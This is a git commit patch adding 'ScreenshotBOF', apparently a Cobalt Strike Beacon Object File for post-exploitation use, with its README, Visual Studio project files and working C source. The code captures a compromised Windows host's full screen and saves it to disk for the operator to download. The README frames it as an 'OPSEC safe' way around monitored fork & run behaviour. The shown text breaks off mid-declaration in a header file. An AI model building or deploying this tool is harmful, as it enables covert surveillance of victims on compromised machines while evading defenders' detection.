From a32d08289530f14815adec040ce527363a5a8912 Mon Sep 17 00:00:00 2001 From: CodeXTF2 Date: Sun, 23 Oct 2022 16:58:24 +0800 Subject: [PATCH] first commit --- .gitignore | 1 + README.md | 21 + ScreenshotBOF.sln | 37 ++ ScreenshotBOF/ScreenshotBOF.vcxproj | 277 ++++++++++++++ ScreenshotBOF/ScreenshotBOF.vcxproj.filters | 32 ++ ScreenshotBOF/ScreenshotBOF.vcxproj.user | 4 + ScreenshotBOF/Source.cpp | 151 ++++++++ ScreenshotBOF/beacon.h | 63 +++ ScreenshotBOF/bofdefs.h | 361 ++++++++++++++++++ .../intermediary/BOF/x64/ScreenshotBOF.log | 23 ++ .../x64/ScreenshotBOF.tlog/CL.command.1.tlog | Bin 0 -> 622 bytes .../BOF/x64/ScreenshotBOF.tlog/CL.read.1.tlog | Bin 0 -> 26542 bytes .../x64/ScreenshotBOF.tlog/CL.write.1.tlog | Bin 0 -> 498 bytes .../ScreenshotBOF.lastbuildstate | 2 + ...ScreenshotBOF.vcxproj.FileListAbsolute.txt | 0 .../x64/ScreenshotBOFx64.Build.CppClean.log | 5 + .../BOF/x64/ScreenshotBOFx64.recipe | 7 + ScreenshotBOF/intermediary/BOF/x64/source.obj | Bin 0 -> 5239 bytes .../intermediary/BOF/x86/ScreenshotBOF.log | 23 ++ .../x86/ScreenshotBOF.tlog/CL.command.1.tlog | Bin 0 -> 652 bytes .../BOF/x86/ScreenshotBOF.tlog/CL.read.1.tlog | Bin 0 -> 26542 bytes .../x86/ScreenshotBOF.tlog/CL.write.1.tlog | Bin 0 -> 498 bytes .../ScreenshotBOF.lastbuildstate | 2 + ...ScreenshotBOF.vcxproj.FileListAbsolute.txt | 0 .../x86/ScreenshotBOFx32.Build.CppClean.log | 5 + .../BOF/x86/ScreenshotBOFx32.recipe | 7 + ScreenshotBOF/intermediary/BOF/x86/source.obj | Bin 0 -> 4153 bytes ScreenshotBOF/resources/strip_bof.ps1 | 127 ++++++ bin/BOF/ScreenshotBOF.x64.obj | Bin 0 -> 5239 bytes bin/BOF/ScreenshotBOF.x86.obj | Bin 0 -> 4153 bytes bin/BOF/screenshotBOF.cna | 21 + 31 files changed, 1169 insertions(+) create mode 100644 .gitignore create mode 100644 README.md create mode 100644 ScreenshotBOF.sln create mode 100644 ScreenshotBOF/ScreenshotBOF.vcxproj create mode 100644 ScreenshotBOF/ScreenshotBOF.vcxproj.filters create mode 100644 ScreenshotBOF/ScreenshotBOF.vcxproj.user create mode 100644 ScreenshotBOF/Source.cpp create mode 100644 ScreenshotBOF/beacon.h create mode 100644 ScreenshotBOF/bofdefs.h create mode 100644 ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.log create mode 100644 ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.tlog/CL.command.1.tlog create mode 100644 ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.tlog/CL.read.1.tlog create mode 100644 ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.tlog/CL.write.1.tlog create mode 100644 ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.tlog/ScreenshotBOF.lastbuildstate create mode 100644 ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.vcxproj.FileListAbsolute.txt create mode 100644 ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOFx64.Build.CppClean.log create mode 100644 ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOFx64.recipe create mode 100644 ScreenshotBOF/intermediary/BOF/x64/source.obj create mode 100644 ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.log create mode 100644 ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.tlog/CL.command.1.tlog create mode 100644 ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.tlog/CL.read.1.tlog create mode 100644 ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.tlog/CL.write.1.tlog create mode 100644 ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.tlog/ScreenshotBOF.lastbuildstate create mode 100644 ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.vcxproj.FileListAbsolute.txt create mode 100644 ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOFx32.Build.CppClean.log create mode 100644 ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOFx32.recipe create mode 100644 ScreenshotBOF/intermediary/BOF/x86/source.obj create mode 100644 ScreenshotBOF/resources/strip_bof.ps1 create mode 100644 bin/BOF/ScreenshotBOF.x64.obj create mode 100644 bin/BOF/ScreenshotBOF.x86.obj create mode 100644 bin/BOF/screenshotBOF.cna diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..b66ae99 --- /dev/null +++ b/.gitignore @@ -0,0 +1 @@ +/.vs \ No newline at end of file diff --git a/README.md b/README.md new file mode 100644 index 0000000..391a2fd --- /dev/null +++ b/README.md @@ -0,0 +1,21 @@ +# ScreenshotBOF + +An alternative screenshot capability for Cobalt Strike that uses WinAPI and does not perform a fork & run. Screenshot saved to disk as a file. + +## Usage +1. import the screenshotBOF.cna script into Cobalt Strike +2. use the command screenshot_bof +3. Download the screenshot from the target e.g. +``` +download screenshot.bmp +``` + +## Notes +- no evasion is performed, which should be fine since the WinAPIs used are not malicious +- in memory downloading of screenshots is planned to be added +- the filename can be changed in the source code. + +## Why did I make this? +Cobalt Strike uses a technique known as fork & run for many of its post-ex capabilities, including the screenshot command. +While this behaviour provides stability, it is now well known and heavily monitored for. This BOF is meant to provide a more +OPSEC safe version of the screenshot capability. \ No newline at end of file diff --git a/ScreenshotBOF.sln b/ScreenshotBOF.sln new file mode 100644 index 0000000..9997b26 --- /dev/null +++ b/ScreenshotBOF.sln @@ -0,0 +1,37 @@ + +Microsoft Visual Studio Solution File, Format Version 12.00 +# Visual Studio Version 16 +VisualStudioVersion = 16.0.30517.126 +MinimumVisualStudioVersion = 10.0.40219.1 +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ScreenshotBOF", "ScreenshotBOF\ScreenshotBOF.vcxproj", "{C04AB0F3-F7E1-4996-9CFA-D1337332EF29}" +EndProject +Global + GlobalSection(SolutionConfigurationPlatforms) = preSolution + BOF|x64 = BOF|x64 + BOF|x86 = BOF|x86 + Debug|x64 = Debug|x64 + Debug|x86 = Debug|x86 + Release|x64 = Release|x64 + Release|x86 = Release|x86 + EndGlobalSection + GlobalSection(ProjectConfigurationPlatforms) = postSolution + {C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.BOF|x64.ActiveCfg = BOF|x64 + {C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.BOF|x64.Build.0 = BOF|x64 + {C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.BOF|x86.ActiveCfg = BOF|Win32 + {C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.BOF|x86.Build.0 = BOF|Win32 + {C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.Debug|x64.ActiveCfg = Debug|x64 + {C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.Debug|x64.Build.0 = Debug|x64 + {C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.Debug|x86.ActiveCfg = Debug|Win32 + {C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.Debug|x86.Build.0 = Debug|Win32 + {C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.Release|x64.ActiveCfg = Release|x64 + {C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.Release|x64.Build.0 = Release|x64 + {C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.Release|x86.ActiveCfg = Release|Win32 + {C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.Release|x86.Build.0 = Release|Win32 + EndGlobalSection + GlobalSection(SolutionProperties) = preSolution + HideSolutionNode = FALSE + EndGlobalSection + GlobalSection(ExtensibilityGlobals) = postSolution + SolutionGuid = {BB40A5A4-261A-4411-8CC0-615E484001A5} + EndGlobalSection +EndGlobal diff --git a/ScreenshotBOF/ScreenshotBOF.vcxproj b/ScreenshotBOF/ScreenshotBOF.vcxproj new file mode 100644 index 0000000..95c3510 --- /dev/null +++ b/ScreenshotBOF/ScreenshotBOF.vcxproj @@ -0,0 +1,277 @@ + + + + + BOF + Win32 + + + Debug + Win32 + + + Release + Win32 + + + BOF + x64 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {c04ab0f3-f7e1-4996-9cfa-d1337332ef29} + ScreenshotBOF + 10.0 + ScreenshotBOF + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + v142 + Console + + + + + Console + + v142 + + + + + + + + + + + + + + + + + + + + + + + $(SolutionDir)bin\$(Configuration)\$(ProjectName).x64.obj;*.cdf;*.cache;*.obj;*.obj.enc;*.ilk;*.ipdb;*.iobj;*.resources;*.tlb;*.tli;*.tlh;*.tmp;*.rsp;*.pgc;*.pgd;*.meta;*.tlog;*.manifest;*.res;*.pch;*.exp;*.idb;*.rep;*.xdc;*.pdb;*_manifest.rc;*.bsc;*.sbr;*.xml;*.metagen;*.bi;$(SolutionDir)bin\$(Configuration)\$(ProjectName).x64.o;$(ExtensionsToDeleteOnClean) + + $(SolutionDir)bin\$(Configuration)\ + intermediary\$(Configuration)\$(Platform)\ + $(ProjectName)x64 + + + $(SolutionDir)bin\$(Configuration)\$(ProjectName).x86.obj;*.cdf;*.cache;*.obj;*.obj.enc;*.ilk;*.ipdb;*.iobj;*.resources;*.tlb;*.tli;*.tlh;*.tmp;*.rsp;*.pgc;*.pgd;*.meta;*.tlog;*.manifest;*.res;*.pch;*.exp;*.idb;*.rep;*.xdc;*.pdb;*_manifest.rc;*.bsc;*.sbr;*.xml;*.metagen;*.bi;$(ExtensionsToDeleteOnClean) + + $(SolutionDir)bin\$(Configuration)\ + $(ProjectName)x32 + intermediary\$(Configuration)\x86\ + + + $(SolutionDir)bin\$(Configuration)\ + $(ProjectName)64 + + + $(SolutionDir)bin\$(Configuration)\ + $(ProjectName)32 + + + $(SolutionDir)bin\$(Configuration)\ + $(ProjectName)32 + + + $(SolutionDir)bin\$(Configuration)\ + $(ProjectName)64 + + + + EnableAllWarnings + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + false + + + Level1 + + + Console + true + + + + + Level4 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + false + Level1 + + + + + Console + true + true + true + + + + + EnableAllWarnings + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + false + true + Level1 + + + Console + true + + + + + Level4 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + false + Level1 + + + Console + true + true + true + + + + + /c /Fo"intermediary\BOF\x64\source" + + + None + false + BOF;%(PreprocessorDefinitions) + + + + + + + + + + + + + + + + + + + + + + + + Level1 + + + xcopy /y "$(SolutionDir)$(ProjectName)\intermediary\$(Configuration)\$(Platform)\source.obj" "$(SolutionDir)bin\$(Configuration)\$(ProjectName).x64.o*"; +powershell -ExecutionPolicy Unrestricted -command "& { . '$(SolutionDir)$(ProjectName)\resources\strip_bof.ps1'; strip-bof -Path '$(SolutionDir)bin\$(Configuration)\$(ProjectName).x64.obj' }" + + + + + /c /Fo"intermediary\BOF\x86\source" + + + None + false + BOF;%(PreprocessorDefinitions) + + + + + + + + + + + + + + + + + + + + + Level1 + + + xcopy /y "$(SolutionDir)$(ProjectName)\intermediary\$(Configuration)\x86\source.obj" "$(SolutionDir)bin\$(Configuration)\$(ProjectName).x86.o*"; + powershell -ExecutionPolicy Unrestricted -command "& { . '$(SolutionDir)$(ProjectName)\resources\strip_bof.ps1'; strip-bof -Path '$(SolutionDir)bin\$(Configuration)\$(ProjectName).x86.obj' }" + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/ScreenshotBOF/ScreenshotBOF.vcxproj.filters b/ScreenshotBOF/ScreenshotBOF.vcxproj.filters new file mode 100644 index 0000000..582dd13 --- /dev/null +++ b/ScreenshotBOF/ScreenshotBOF.vcxproj.filters @@ -0,0 +1,32 @@ + + + + + {f23d5754-25e5-46a9-b783-8685f48d2291} + + + {72263c50-a87a-4d99-9746-3def65c61180} + + + {999efb6a-e35d-49fb-bf81-1ebab5077dd0} + + + + + Source Files + + + + + Header Files + + + Header Files + + + + + Resources + + + \ No newline at end of file diff --git a/ScreenshotBOF/ScreenshotBOF.vcxproj.user b/ScreenshotBOF/ScreenshotBOF.vcxproj.user new file mode 100644 index 0000000..88a5509 --- /dev/null +++ b/ScreenshotBOF/ScreenshotBOF.vcxproj.user @@ -0,0 +1,4 @@ + + + + \ No newline at end of file diff --git a/ScreenshotBOF/Source.cpp b/ScreenshotBOF/Source.cpp new file mode 100644 index 0000000..cb6669e --- /dev/null +++ b/ScreenshotBOF/Source.cpp @@ -0,0 +1,151 @@ +#include +#include +#include "bofdefs.h" +#pragma comment(lib, "User32.lib") +#pragma comment(lib, "Gdi32.lib") + + + +#pragma region error_handling +#define print_error(msg, hr) _print_error(__FUNCTION__, __LINE__, msg, hr) +BOOL _print_error(char* func, int line, char* msg, HRESULT hr) { +#ifdef BOF + BeaconPrintf(CALLBACK_ERROR, "(%s at %d): %s 0x%08lx", func, line, msg, hr); +#else + printf("[-] (%s at %d): %s 0x%08lx", func, line, msg, hr); +#endif // BOF + + return FALSE; +} +#pragma endregion + + +BOOL SaveHBITMAPToFile(HBITMAP hBitmap, LPCTSTR lpszFileName) +{ + HDC hDC; + int iBits; + WORD wBitCount; + DWORD dwPaletteSize = 0, dwBmBitsSize = 0, dwDIBSize = 0, dwWritten = 0; + BITMAP Bitmap0; + BITMAPFILEHEADER bmfHdr; + BITMAPINFOHEADER bi; + LPBITMAPINFOHEADER lpbi; + HANDLE fh, hDib, hPal, hOldPal2 = NULL; + hDC = CreateDC(TEXT("DISPLAY"), NULL, NULL, NULL); + iBits = GetDeviceCaps(hDC, BITSPIXEL) * GetDeviceCaps(hDC, PLANES); + DeleteDC(hDC); + if (iBits <= 1) + wBitCount = 1; + else if (iBits <= 4) + wBitCount = 4; + else if (iBits <= 8) + wBitCount = 8; + else + wBitCount = 24; + GetObject(hBitmap, sizeof(Bitmap0), (LPSTR)&Bitmap0); + bi.biSize = sizeof(BITMAPINFOHEADER); + bi.biWidth = Bitmap0.bmWidth; + bi.biHeight = -Bitmap0.bmHeight; + bi.biPlanes = 1; + bi.biBitCount = wBitCount; + bi.biCompression = BI_RGB; + bi.biSizeImage = 0; + bi.biXPelsPerMeter = 0; + bi.biYPelsPerMeter = 0; + bi.biClrImportant = 0; + bi.biClrUsed = 256; + dwBmBitsSize = ((Bitmap0.bmWidth * wBitCount + 31) & ~31) / 8 + * Bitmap0.bmHeight; + hDib = GlobalAlloc(GHND, dwBmBitsSize + dwPaletteSize + sizeof(BITMAPINFOHEADER)); + lpbi = (LPBITMAPINFOHEADER)GlobalLock(hDib); + *lpbi = bi; + + hPal = GetStockObject(DEFAULT_PALETTE); + if (hPal) + { + hDC = GetDC(NULL); + hOldPal2 = SelectPalette(hDC, (HPALETTE)hPal, FALSE); + RealizePalette(hDC); + } + + + GetDIBits(hDC, hBitmap, 0, (UINT)Bitmap0.bmHeight, (LPSTR)lpbi + sizeof(BITMAPINFOHEADER) + + dwPaletteSize, (BITMAPINFO*)lpbi, DIB_RGB_COLORS); + + if (hOldPal2) + { + SelectPalette(hDC, (HPALETTE)hOldPal2, TRUE); + RealizePalette(hDC); + ReleaseDC(NULL, hDC); + } + + fh = CreateFile(lpszFileName, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, + FILE_ATTRIBUTE_NORMAL | FILE_FLAG_SEQUENTIAL_SCAN, NULL); + + if (fh == INVALID_HANDLE_VALUE) + return FALSE; + + bmfHdr.bfType = 0x4D42; // "BM" + dwDIBSize = sizeof(BITMAPFILEHEADER) + sizeof(BITMAPINFOHEADER) + dwPaletteSize + dwBmBitsSize; + bmfHdr.bfSize = dwDIBSize; + bmfHdr.bfReserved1 = 0; + bmfHdr.bfReserved2 = 0; + bmfHdr.bfOffBits = (DWORD)sizeof(BITMAPFILEHEADER) + (DWORD)sizeof(BITMAPINFOHEADER) + dwPaletteSize; + + WriteFile(fh, (LPSTR)&bmfHdr, sizeof(BITMAPFILEHEADER), &dwWritten, NULL); + + WriteFile(fh, (LPSTR)lpbi, dwDIBSize, &dwWritten, NULL); + GlobalUnlock(hDib); + GlobalFree(hDib); + CloseHandle(fh); + return TRUE; +} + +#ifdef BOF +void go(char* buff, int len) { + BeaconPrintf(0x0, "[*] Tasked beacon to printscreen and save to disk"); + int x1, y1, x2, y2, w, h; + // get screen dimensions + x1 = GetSystemMetrics(SM_XVIRTUALSCREEN); + y1 = GetSystemMetrics(SM_YVIRTUALSCREEN); + x2 = GetSystemMetrics(SM_CXVIRTUALSCREEN); + y2 = GetSystemMetrics(SM_CYVIRTUALSCREEN); + w = x2 - x1; + h = y2 - y1; + + // copy screen to bitmap + HDC hScreen = GetDC(NULL); + HDC hDC = CreateCompatibleDC(hScreen); + HBITMAP hBitmap = CreateCompatibleBitmap(hScreen, w, h); + HGDIOBJ old_obj = SelectObject(hDC, hBitmap); + BOOL bRet = BitBlt(hDC, 0, 0, w, h, hScreen, x1, y1, SRCCOPY); + + //I was going to pull from the clipboard but then realized it + //was more trouble than it was worth, so I just saved it to a file. ~ CodeX + + // save bitmap to clipboard + OpenClipboard(NULL); + EmptyClipboard(); + SetClipboardData(CF_BITMAP, hBitmap); + CloseClipboard(); + + BeaconPrintf(0x0, "[+] PrintScreen saved to bitmap..."); + LPCSTR filename = "screenshot.bmp"; + SaveHBITMAPToFile(hBitmap, (LPCTSTR)filename); + + BeaconPrintf(0x0, "[+] Printscreen bitmap saved to screenshot.bmp"); + // clean up + SelectObject(hDC, old_obj); + DeleteDC(hDC); + ReleaseDC(NULL, hScreen); + DeleteObject(hBitmap); +} + + +#else + +void main(int argc, char* argv[]) { + +} + +#endif \ No newline at end of file diff --git a/ScreenshotBOF/beacon.h b/ScreenshotBOF/beacon.h new file mode 100644 index 0000000..e70bebc --- /dev/null +++ b/ScreenshotBOF/beacon.h @@ -0,0 +1,63 @@ +#pragma once + +/* + * Beacon Object Files (BOF) + * ------------------------- + * A Beacon Object File is a light-weight post exploitation tool that runs + * with Beacon's inline-execute command. + * + * Cobalt Strike 4.1. + */ + +/* data API */ +typedef struct { + char * original; /* the original buffer [so we can free it] */ + char * buffer; /* current pointer into our buffer */ + int length; /* remaining length of data */ + int size; /* total size of this buffer */ +} datap; + +DECLSPEC_IMPORT void BeaconDataParse(datap * parser, char * buffer, int size); +DECLSPEC_IMPORT int BeaconDataInt(datap * parser); +DECLSPEC_IMPORT short BeaconDataShort(datap * parser); +DECLSPEC_IMPORT int BeaconDataLength(datap * parser); +DECLSPEC_IMPORT char * BeaconDataExtract(datap * parser, int * size); + +/* format API */ +typedef struct { + char * original; /* the original buffer [so we can free it] */ + char * buffer; /* current pointer into our buffer */ + int length; /* remaining length of data */ + int size; /* total size of this buffer */ +} formatp; + +DECLSPEC_IMPORT void BeaconFormatAlloc(formatp * format, int maxsz); +DECLSPEC_IMPORT void BeaconFormatReset(formatp * format); +DECLSPEC_IMPORT void BeaconFormatFree(formatp * format); +DECLSPEC_IMPORT void BeaconFormatAppend(formatp * format, char * text, int len); +DECLSPEC_IMPORT void BeaconFormatPrintf(formatp * format, char * fmt, ...); +DECLSPEC_IMPORT char * BeaconFormatToString(formatp * format, int * size); +DECLSPEC_IMPORT void BeaconFormatInt(formatp * format, int value); + +/* Output Functions */ +#define CALLBACK_OUTPUT 0x0 +#define CALLBACK_OUTPUT_OEM 0x1e +#define CALLBACK_ERROR 0x0d +#define CALLBACK_OUTPUT_UTF8 0x20 + +DECLSPEC_IMPORT void BeaconPrintf(int type, char * fmt, ...); +DECLSPEC_IMPORT void BeaconOutput(int type, char * data, int len); + +/* Token Functions */ +DECLSPEC_IMPORT BOOL BeaconUseToken(HANDLE token); +DECLSPEC_IMPORT void BeaconRevertToken(); +DECLSPEC_IMPORT BOOL BeaconIsAdmin(); + +/* Spawn+Inject Functions */ +DECLSPEC_IMPORT void BeaconGetSpawnTo(BOOL x86, char * buffer, int length); +DECLSPEC_IMPORT void BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len); +DECLSPEC_IMPORT void BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len); +DECLSPEC_IMPORT void BeaconCleanupProcess(PROCESS_INFORMATION * pInfo); + +/* Utility Functions */ +DECLSPEC_IMPORT BOOL toWideChar(char * src, wchar_t * dst, int max); diff --git a/ScreenshotBOF/bofdefs.h b/ScreenshotBOF/bofdefs.h new file mode 100644 index 0000000..c960e31 --- /dev/null +++ b/ScreenshotBOF/bofdefs.h @@ -0,0 +1,361 @@ +#pragma once +/* some code and/or ideas are from trustedsec SA Github repo -- thankyou trustedsec! */ +#include + + +#ifdef BOF + +#ifdef __cplusplus +extern "C" { +#endif + +#include "beacon.h" + +void go(char* buff, int len); + +/* resolve some extra funcs for the screenshot */ + + DECLSPEC_IMPORT DWORD WINAPI User32$MessageBoxA(HWND, LPCTSTR, LPCTSTR, UINT); +#define MessageBoxCustom User32$MessageBoxA + + DECLSPEC_IMPORT int WINAPI User32$GetSystemMetrics(int nIndex); +#define GetSystemMetrics User32$GetSystemMetrics + + DECLSPEC_IMPORT HDC WINAPI User32$GetDC(HWND hWnd); +#define GetDC User32$GetDC + + DECLSPEC_IMPORT HDC WINAPI GDI32$CreateCompatibleDC(HDC hdc); +#define CreateCompatibleDC GDI32$CreateCompatibleDC + + DECLSPEC_IMPORT HBITMAP WINAPI GDI32$CreateCompatibleBitmap(HDC hdc, int cx, int cy); +#define CreateCompatibleBitmap GDI32$CreateCompatibleBitmap + + DECLSPEC_IMPORT HGDIOBJ WINAPI GDI32$SelectObject(HDC hdc, HGDIOBJ h); +#define SelectObject GDI32$SelectObject + + DECLSPEC_IMPORT BOOL WINAPI GDI32$BitBlt(HDC hdc, + int x, + int y, + int cx, + int cy, + HDC hdcSrc, + int x1, + int y1, + DWORD rop); +#define BitBlt GDI32$BitBlt + + DECLSPEC_IMPORT BOOL WINAPI User32$OpenClipboard(HWND hWndNewOwner); +#define OpenClipboard User32$OpenClipboard + + DECLSPEC_IMPORT BOOL WINAPI User32$EmptyClipboard(); +#define EmptyClipboard User32$EmptyClipboard + + DECLSPEC_IMPORT BOOL WINAPI User32$SetClipboardData(UINT uFormat, HANDLE hMem); +#define SetClipboardData User32$SetClipboardData + + DECLSPEC_IMPORT BOOL WINAPI User32$CloseClipboard(); +#define CloseClipboard User32$CloseClipboard + + DECLSPEC_IMPORT BOOL WINAPI GDI32$DeleteDC(HDC hdc); +#define DeleteDC GDI32$DeleteDC + + DECLSPEC_IMPORT int WINAPI User32$ReleaseDC(HWND hWnd, HDC hDC); +#define ReleaseDC User32$ReleaseDC + + DECLSPEC_IMPORT HGDIOBJ WINAPI GDI32$DeleteObject(HGDIOBJ ho); +#define DeleteObject GDI32$DeleteObject + + + + /* End of function resolutions for screenshot */ + + /* Resolve some functions for writing BMP to disk*/ + + DECLSPEC_IMPORT HDC WINAPI GDI32$CreateDCA(LPCSTR pwszDriver, + LPCSTR pwszDevice, + LPCSTR pszPort, + const DEVMODEA* pdm); +#define CreateDCA GDI32$CreateDCA + + DECLSPEC_IMPORT int WINAPI GDI32$GetDeviceCaps(HDC hdc, + int index); +#define GetDeviceCaps GDI32$GetDeviceCaps + + DECLSPEC_IMPORT int WINAPI GDI32$GetObjectA(HANDLE h, + int c, + LPVOID pv); +#define GetObjectA GDI32$GetObjectA + DECLSPEC_IMPORT HGLOBAL WINAPI KERNEL32$GlobalAlloc( + UINT uFlags, + SIZE_T dwBytes); +#define GlobalAlloc KERNEL32$GlobalAlloc + + DECLSPEC_IMPORT WINBASEAPI LPVOID WINAPI KERNEL32$GlobalLock(HGLOBAL); +#define GlobalLock KERNEL32$GlobalLock + + DECLSPEC_IMPORT WINGDIAPI HGDIOBJ WINAPI GDI32$GetStockObject(int); +#define GetStockObject GDI32$GetStockObject + + DECLSPEC_IMPORT WINGDIAPI HPALETTE WINAPI GDI32$SelectPalette(HDC, HPALETTE, BOOL); +#define SelectPalette GDI32$SelectPalette + + DECLSPEC_IMPORT WINGDIAPI UINT WINAPI GDI32$RealizePalette(HDC); +#define RealizePalette GDI32$RealizePalette + + DECLSPEC_IMPORT WINGDIAPI int WINAPI GDI32$GetDIBits(HDC hdc, + HBITMAP hbm, + UINT start, + UINT cLines, + LPVOID lpvBits, + LPBITMAPINFO lpbmi, + UINT usage); +#define GetDIBits GDI32$GetDIBits + + DECLSPEC_IMPORT WINBASEAPI BOOL WINAPI KERNEL32$GlobalUnlock(HGLOBAL); +#define GlobalUnlock KERNEL32$GlobalUnlock + + DECLSPEC_IMPORT WINBASEAPI HGLOBAL WINAPI KERNEL32$GlobalFree(HGLOBAL); +#define GlobalFree KERNEL32$GlobalFree + + DECLSPEC_IMPORT WINBASEAPI BOOL WINAPI KERNEL32$CloseHandle(HANDLE); +#define CloseHandle KERNEL32$CloseHandle + + + + + /* End of function resolutions for writing BMP to disk */ + + +/* COM */ +DECLSPEC_IMPORT HRESULT WINAPI OLE32$CLSIDFromString(LPCWSTR, LPCLSID); +DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoCreateInstance(REFCLSID rclsid, LPUNKNOWN pUnkOuter, DWORD dwClsContext, REFIID riid, LPVOID* ppv); +DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitializeEx(LPVOID, DWORD); +DECLSPEC_IMPORT VOID WINAPI OLE32$CoUninitialize(); +DECLSPEC_IMPORT HRESULT WINAPI OLE32$IIDFromString(LPWSTR lpsz, LPIID lpiid); +DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitialize(LPVOID pvReserved); +DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoCreateInstanceEx(REFCLSID, IUnknown*, DWORD, COSERVERINFO*, DWORD, MULTI_QI*); +DECLSPEC_IMPORT BSTR WINAPI OleAut32$SysAllocString(const OLECHAR*); +DECLSPEC_IMPORT LPVOID WINAPI OLEAUT32$VariantInit(VARIANTARG* pvarg); +DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitializeSecurity(PSECURITY_DESCRIPTOR pSecDesc, LONG cAuthSvc, SOLE_AUTHENTICATION_SERVICE* asAuthSvc, void* pReserved1, DWORD dwAuthnLevel, DWORD dwImpLevel, void* pAuthList, DWORD dwCapabilities, void* pReserved3); + +/* Registry */ +DECLSPEC_IMPORT LSTATUS APIENTRY ADVAPI32$RegOpenKeyExA(HKEY hKey, LPCSTR lpSubKey, DWORD ulOptions, REGSAM samDesired, PHKEY phkResult); +DECLSPEC_IMPORT LSTATUS APIENTRY ADVAPI32$RegDeleteTreeA(HKEY hKey, LPCSTR lpSubKey); +DECLSPEC_IMPORT LSTATUS APIENTRY ADVAPI32$RegCreateKeyExA(HKEY hKey, LPCSTR lpSubKey, DWORD Reserved, LPSTR lpClass, DWORD dwOptions, REGSAM samDesired, + CONST LPSECURITY_ATTRIBUTES lpSecurityAttributes, PHKEY phkResult, LPDWORD lpdwDisposition); +DECLSPEC_IMPORT LSTATUS APIENTRY ADVAPI32$RegSetValueExA(HKEY hKey, LPCSTR lpValueName, DWORD Reserved, DWORD dwType, + CONST BYTE* lpData, DWORD cbData); + + +/* FileSystem */ +DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$CreateFileA(LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile); +DECLSPEC_IMPORT DWORD WINAPI KERNEL32$SetFilePointer(HANDLE hFile, LONG lDistanceToMove, PLONG lpDistanceToMoveHigh, DWORD dwMoveMethod); +DECLSPEC_IMPORT BOOL WINAPI KERNEL32$SetFilePointerEx(HANDLE hFile, LARGE_INTEGER liDistanceToMove, PLARGE_INTEGER lpDistanceToMoveHigh, DWORD dwMoveMethod); +DECLSPEC_IMPORT BOOL WINAPI KERNEL32$WriteFile(HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPDWORD lpNumberOfBytesWritten, LPOVERLAPPED lpOverlapped); +DECLSPEC_IMPORT BOOL WINAPI KERNEL32$GetFileSizeEx(HANDLE hFile, PLARGE_INTEGER lpFileSize); +DECLSPEC_IMPORT DWORD WINAPI VERSION$GetFileVersionInfoSizeW(LPCWSTR lptstrFilenamea, LPDWORD lpdwHandle); +DECLSPEC_IMPORT BOOL WINAPI VERSION$GetFileVersionInfoW(LPCWSTR lptstrFilename, DWORD dwHandle, DWORD dwLen, LPVOID lpData); +DECLSPEC_IMPORT BOOL WINAPI VERSION$VerQueryValueW(LPCVOID pBlock, LPCWSTR lpSubBlock, LPVOID* lplpBuffer, PUINT puLen); + + +/* Memory */ +DECLSPEC_IMPORT LPVOID WINAPI KERNEL32$HeapAlloc(HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes); +DECLSPEC_IMPORT BOOL WINAPI KERNEL32$HeapFree(HANDLE, DWORD, PVOID); +DECLSPEC_IMPORT LPVOID WINAPI KERNEL32$HeapReAlloc(HANDLE hHeap, DWORD dwFlags, LPVOID lpMem, SIZE_T dwBytes); +DECLSPEC_IMPORT void* __cdecl MSVCRT$memcpy(LPVOID, LPVOID, size_t); +DECLSPEC_IMPORT void __cdecl MSVCRT$memset(void*, int, size_t); + + +/* Process */ +DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$OpenProcess(DWORD 